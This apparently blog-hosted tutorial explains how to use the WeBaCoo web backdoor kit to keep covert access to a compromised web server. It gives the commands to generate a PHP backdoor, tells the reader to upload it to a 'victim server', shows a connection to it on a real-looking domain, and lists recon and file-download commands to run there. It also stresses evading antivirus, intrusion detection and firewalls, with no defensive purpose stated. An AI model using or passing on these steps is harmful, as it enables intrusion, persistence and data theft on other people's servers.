Webacoo – Web Backdoor Cookie Script-Kit

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.

First Download webacoo script from here on your desktop

Now unzip the file unzip webacoo.zip

Now Type Command: ./webcoo.pl –g –o webdoor.php

This will generate code for a backdoor (-g) Generate backdoor code (-o is required). Here is a screenshot of the command terminal view:

Now upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type following command:

. / webacoo.pl -t  -u //telecallerjobs.com/webdoor.php

Ls – List information about the FILEs (the current directory by default)

Uname –a – print all information

Free – display information about free and used memory on the system

pwd – print name of current/working directory

Df –  displays the amount of disk space available on the filesystem containing each file name argument

W – Displays information about the users currently on the machine, and their processes.

route – show / manipulate the IP routing table

Load – Load machine code and initialize new commands.

Download – Download file from server

Cat – cat to view the file, we see only the normal text

Leave a Reply

Your email address will not be published. Required fields are marked *